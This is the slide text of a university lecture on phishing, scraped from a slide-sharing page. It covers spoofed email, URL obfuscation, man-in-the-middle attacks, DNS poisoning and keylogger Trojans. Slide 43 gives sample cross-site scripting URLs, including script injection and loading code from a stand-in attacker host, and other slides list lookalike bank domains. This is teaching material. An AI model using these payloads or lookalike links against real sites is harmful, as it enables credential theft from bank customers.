Research Methodology and Tips on Better ResearchResearch Methodology and Tips on Better Research
Research Methodology and Tips on Better Research
 
Common evaluation measures in NLP and IR
Common evaluation measures in NLP and IRCommon evaluation measures in NLP and IR
Common evaluation measures in NLP and IR
 
Machine learning with nlp 101
Machine learning with nlp 101Machine learning with nlp 101
Machine learning with nlp 101
 
Natural Language Processing: Parsing
Natural Language Processing: ParsingNatural Language Processing: Parsing
Natural Language Processing: Parsing
 
Types of machine translation
Types of machine translationTypes of machine translation
Types of machine translation
 
L1 l2 l3 introduction to machine translation
L1 l2 l3  introduction to machine translationL1 l2 l3  introduction to machine translation
L1 l2 l3 introduction to machine translation
 
Syntax and semantics
Syntax and semanticsSyntax and semantics
Syntax and semantics
 
Propositional logic
Propositional logicPropositional logic
Propositional logic
 
Probabilistic logic
Probabilistic logicProbabilistic logic
Probabilistic logic
 
Knowledge structure
Knowledge structureKnowledge structure
Knowledge structure
 
Knowledge representation
Knowledge representationKnowledge representation
Knowledge representation
 
First order logic
First order logicFirst order logic
First order logic
 
Belief function
Belief functionBelief function
Belief function
 
L3 defense
L3  defenseL3  defense
L3 defense
 
L2 Intrusion Detection System (IDS)
L2  Intrusion Detection System (IDS)L2  Intrusion Detection System (IDS)
L2 Intrusion Detection System (IDS)
 
L2 l3 l4 software process models
L2 l3 l4  software process modelsL2 l3 l4  software process models
L2 l3 l4 software process models
 
L13 why software fails
L13  why software failsL13  why software fails
L13 why software fails
 
Lecture 14,15 and 16 file systems
Lecture 14,15 and 16  file systemsLecture 14,15 and 16  file systems
Lecture 14,15 and 16 file systems
 
Lecture 11,12 and 13 deadlocks
Lecture 11,12 and 13  deadlocksLecture 11,12 and 13  deadlocks
Lecture 11,12 and 13 deadlocks
 
Lecture 7, 8, 9 and 10 Inter Process Communication (IPC) in Operating Systems
Lecture 7, 8, 9 and 10  Inter Process Communication (IPC) in Operating SystemsLecture 7, 8, 9 and 10  Inter Process Communication (IPC) in Operating Systems
Lecture 7, 8, 9 and 10 Inter Process Communication (IPC) in Operating Systems
 

Kürzlich hochgeladen

Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupStreamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupFlorian Wilhelm
 
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Patryk Bandurski
 
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks..."LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...Fwdays
 
Commit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyCommit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyAlfredo García Lavilla
 
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii SoldatenkoFwdays
 
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek SchlawackFwdays
 
DevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenDevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenHervé Boutemy
 
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr LapshynFwdays
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationSafe Software
 
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)Wonjun Hwang
 
Artificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxArtificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxhariprasad279825
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsSergiu Bodiu
 
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024BookNet Canada
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr BaganFwdays
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationSlibray Presentation
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfAlex Barbosa Coqueiro
 
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage CostLeverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage CostZilliz
 
Search Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdfSearch Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdfRankYa
 
Install Stable Diffusion in windows machine
Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machinePadma Pradeep
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationRidwan Fadjar
 

Kürzlich hochgeladen (20)

Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupStreamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project Setup
 
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
 
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks..."LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
 
Commit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyCommit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easy
 
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko
 
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
 
DevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenDevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache Maven
 
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
 
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
 
Artificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxArtificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptx
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platforms
 
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck Presentation
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdf
 
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage CostLeverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
 
Search Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdfSearch Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdf
 
Install Stable Diffusion in windows machine
Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machine
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 Presentation
 

L1 phishing

  • 1. PhishingPhishing 1Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh
  • 2. About me  Currently, Lecturer in this department for 351 days   Former Research Intern in M3C Laboratory, University of Bolton, UK Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 2
  • 3. For you  Email me at rushdecoder@yahoo.com if you want  My homepage and course materials are at http://rushdishams.googlepages.com  You need to join http://groups.google.com/group/csebatche sofrushdi Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 3
  • 4. Phishing  The number of unique e-mail-based fraud attacks detected in November 2005 was 16,882, almost double the 8,975 attacks launched in November 2004, said the report (Anti-Phishing Working Group)  Phishing e-mails pretend to come from legitimate companies, such as banks and e- commerce sites  Used by criminals to try and trick Web users into revealing personal information and account detailsRushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 4
  • 5. Phishing  The number of brands targeted increased by nearly 50 percent over the course of 2005, from 64 percent to 93 percent in November 2006  "One big attack will temporarily hurt a brand, but the increase in e-commerce is not slowing down," (Mark Murtagh, Websense technical director) Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 5
  • 6. Phishing  Top brands continue to be hijacked, with phishers using established names to try to lure people to their sites  eBay is often spoofed, for obvious reasons  Google is increasingly being targeted because of its expansion into different business application models.  The big banking names are used too--HSBC, Citigroup, Lloyds--all the major brands Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 6
  • 7. Phishing  There's no point in using local names if the attack is global  Attacks are becoming increasingly sophisticated  Web sites are hosting keylogging malicious software  Before, people had to click on a site to download malicious code.  If they thought a web site 'phishy,' they could leave and probably not be harmed.  Now. with most phishing sites they just have to Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 7
  • 8. Phishing  Twenty-five percent of those sites now host keylogging code  If you visit one you will probably open yourself to identity theft or fraud Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 8
  • 9. Exploiting the Weakness  Why is it that Crooks are able to mount an attack?  What are the weaknesses that they exploit?  Richness of functionality Complex systems can have program bugs  Increasing interconnectivity Separate functions of any system are combined and interconnected via Internet Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 9
  • 10. Exploiting the Weakness  Expanding market in exploits Very few people requires as the technical gadgets are impressive and cheap  The scale of content based attacks Everyone uses e-mails and e-mails are exploitable. Then why not? Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 10
  • 11. Social Engineering Factors  Phishing attacks rely upon a mix of technical deceit and social engineering practices.  In the majority of cases the Phisher must persuade the victim  The victim intentionally performs a series of actions that will provide access to confidential information Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 11
  • 12. Social Engineering Factors  Communication channels such as email, web-pages, IRC and instant messaging services are popular.  Phisher must impersonate a trusted source (e.g. the helpdesk of their bank, automated support response from their favourite online retailer, etc.) for the victim to believe. Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 12
  • 13. Social Engineering Factors Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 13
  • 14. Phishing Techniques  Phishing attacks initiated by email are the most common.  Using Trojan Network, Phishers can deliver specially crafted emails to millions of legitimate “live” email addresses within a few hours  Sometimes phishers purchase e-mail address Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 14
  • 15. Phishing Techniques  Utilising well known flaws in the common mail server communication protocol (SMTP), Phishers are able to create emails with fake “Mail From:” headers and impersonate any organisation they choose.  Any customer replies to the phishing email will be sent to them. Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 15
  • 16. Phishing Techniques  Official looking and sounding emails  Copies of legitimate corporate emails with minor URL changes  HTML based email used to obfuscate target URL information  Standard virus/worm attachments to emails Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 16
  • 17. Phishing Techniques  A plethora of anti spam-detection inclusions  Crafting of “personalised” or unique email messages  Fake postings to popular message boards and mailing lists  Use of fake “Mail From:” addresses and open mail relays for disguising the source of the email Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 17
  • 18. A real-life phishing example Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 18
  • 19. Things to note  The email was sent in HTML format  Lower-case L’s have been replaced with upper-case I’s. This is used to help bypass many standard anti-spam filters Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 19
  • 20. Things to note  Within the HTML-based email, the URL link https://oIb.westpac.com.au/ib/defauIt.asp in fact points to a escape-encoded version of the following URL: http://olb.westpac.com.au.userdll.com:4903/ib/index. htm Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 20
  • 21. Things to note Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 21
  • 22. Things to note  The non-standard HTTP port of 4903 can be attributed to the fact that the Phishers fake site was hosted on a third-party PC that had been previously compromised by an attacker Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 22
  • 23. Things to note  Recipients that clicked on the link were then forwarded to the real Westpac application.  However a JavaScript popup window containing a fake login page was presentedRushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 23
  • 24. Things to note  This fake login window was designed to capture and store the recipient’s authentication credentials  JavaScript also submitted the authentication information to the real Westpac application Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 24
  • 25. Where are they standing now?  The inclusion of HTML disguised links  The use of third-party supplied, or fake, banner advertising graphics to lure customers  The use of web-bugs (hidden items within the page – such as a zero-sized graphic) to track a potential customer  The use of pop-up or frameless windows to disguise the true source of the Phishers message. Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 25
  • 26. Where are they standing now?  Embedding malicious content within the viewable web-page  installs software of the Phishers choice (e.g. key-loggers, screen-grabbers, back-doors and other Trojan horse programs). Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 26
  • 27. Banner Advertising Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 27
  • 28. IRC and IM  New on the Phishers radar, IRC and Instant Messaging (IM) forums are likely to become a popular phishing ground.  The common usage of Bots (automated programs that listen and participate in group discussions) in many of the popular channels, Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 28
  • 29. Trojan Hosts  the delivery source is increasingly becoming home PC’s that have been previously compromised.  Trojan horse program has been installed which allows Phishers (along with Spammers, Warez Pirates, DDoS Bots, etc.) to use the PC as a message propagator.  tracking back a Phishing attack to an individual initiating criminal is extremely difficult. Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 29
  • 30. Trojan Hosts  the installation of Trojan horse software is on the increase, despite the efforts of large anti-virus companies.  operate large networks of Trojan deployments (networks consisting of thousands of hosts are not uncommon)  Phishers must be selective about the information they wish to record or be faced with information overload. Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 30
  • 31. Information Specific Trojans  You have come across a file named JavaUtil.zip.  But you forgot that you have “do not show known file extensions” in your Windows setting.  Hmm, then JavaUtil.zip originally maybe a .exe file whose full name is JavaUtil.zip.exe  You, unfortunately, click that zip file to unzip it.  You are doomed!  Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 31
  • 32. Information Specific Trojans  Early in 2004, a Phisher created a custom key-logger Trojan.  The Trojan key-logger was designed specifically to capture all key presses within windows with the titles of various names including:- commbank, Commonwealth, NetBank, Citibank, Bank of America, e-gold, e-bullion, e-Bullion, evocash, EVOCash, EVOcash, intgold, INTGold, paypal, PayPal, bankwest, Bank West, BankWest, National Internet Banking, cibc, CIBC, scotiabank and ScotiaBank Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 32
  • 33. Phishing Attack Vectors  Man-in-the-middle Attacks  URL Obfuscation Attacks  Cross-site Scripting Attacks  Preset Session Attacks Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 33
  • 34. Man in the Middle Attacks  the attacker situates themselves between the customer and the real web-based application, and proxies all communications between the systems.  This form of attack is successful for both HTTP and HTTPS communications.  The customer connects to the attackers server as if it was the real site  The attackers server makes a simultaneous connection to the real site. Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 34
  • 35. Man in the Middle Attacks  The attackers server then proxies all communications between the customer and the real web-based application server  In the case of secure HTTPS communications, an SSL connection is established between the customer and the attackers proxy  while the attackers proxy creates its own SSL connection between itself and the real server. Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 35
  • 36. Man in the Middle Attacks Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 36
  • 37. Man in the Middle Attacks  The attacker must be able to direct the customer to their proxy server instead of the real server.  This may be carried out through a number of methods:  Transparent Proxies  DNS Cache Poisoning  URL Obfuscation Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 37
  • 38. Transparent Proxies  Situated on the same network segment or located on route to the real server  a transparent proxy service can intercept all data by forcing all outbound HTTP and HTTPS traffic through itself. Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 38
  • 39. DNS Cache Poisoning  be used to disrupt normal traffic routing by injecting false IP addresses for key domain names.  the attacker poisons the DNS cache of a network firewall so that all traffic destined for the MyBank IP address now resolves to the attackers proxy server IP address Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 39
  • 40. URL Obfuscation  the attacker tricks the customer into connecting to their proxy server instead of the real server.  the customer may follow a link to http://privatebanking.mybank.com.ch http://mybank.privatebanking.com http://privatebanking.mybonk.com http://privatebanking.mybánk.com http://privatebanking.mybank.hackproof.com  And the real one is http://privatebanking.mybank.com Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 40
  • 41. Third party shortened URL Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 41
  • 42. Cross Site Scripting (XSS)  make use of custom URL or code injection into a valid web-based application URL  the result of poor web-application development processes. Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 42
  • 43. Cross Site Scripting (XSS)  Full HTML substitution such as: http://mybank.com/ebanking?URL=http://evilsite.com/phishing/fakepage.htm  Inline embedding of scripting content, such as: http://mybank.com/ebanking?page=1&client=<SCRIPT>evilcode  Forcing the page to load external scripting code, such as: http://mybank.com/ebanking?page=1&response=evilsite.com%21evilcode.js&go=2 Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 43
  • 44. Cross Site Scripting (XSS) Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 44
  • 45. Preset Session Attack Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 45
  • 46. Hidden Frame Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 46
  • 47. Graphical Substitution Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 47
  • 48. References  The Phishing Guide by Next Generation Security Software Software Limited. Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 48
  • 49. Related Papers  Technical Trends in Phishing Attacks by Jason Milletary  Why Phishing Works by Dhamija et al. Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 49